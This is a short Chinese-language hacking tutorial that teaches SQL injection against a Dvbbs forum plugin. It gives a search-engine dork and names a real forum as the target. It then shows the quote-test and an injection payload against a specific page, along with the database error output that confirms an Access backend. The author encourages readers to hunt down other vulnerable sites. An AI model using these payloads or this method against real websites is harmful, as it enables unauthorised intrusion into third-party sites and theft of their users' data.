在百度搜索“dvbbs 社区法院”
我只提供大家一个思路,请大家别搞破坏哦!~
这里我已经找好一个了 http://www.723500.cn/bbs
现在我来教大家找动网插件的注入漏洞
首先一样得先注册
不好意思,我刚注册了个bangbang了,嘿嘿,注册这种事就不用演示了吧!~
大家看我怎么寻找漏洞
社区设施--社区法院---状纸清单
http://www.723500.cn/bbs/plus_fayuan_lookdisp.asp?ID=1随便打开一个状纸!~
接着我们来测试下,是否存在注入漏洞
http://www.723500.cn/bbs/plus_fayuan_lookdisp.asp?ID=1在后面加个 ’
Microsoft JET Database Engine 错误 ’80040e14’
字符串的语法错误 在查询表达式 ’ID=1’’ 中。
/bbs/plus_fayuan_lookdisp.asp,行 11
看到了吧?嘿嘿,再把’改为%20or%200<>(select%20count(*)%20from%20c:\winnt\system32\cmd.exe.c)
Microsoft JET Database Engine 错误 ’80004005’
’c:\winnt\system32\cmd.exe’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。
/bbs/plus_fayuan_lookdisp.asp,行 11
大家应该一看这个就知道这是MDB数据库,MDB数据库其实也可以跨库查询
这就给动网带来了很大的隐患,大家说是么?? 嘎嘎 :)
其实很多网站都存在这样的漏洞的,大家自己去找找就会发现的!~
by:棒棒 QQ:180180029 我建议大家加群来跟我聊,我的好友已满了,不好意思哦
恭喜,该URL可以注入!
数据库类型:Access数据库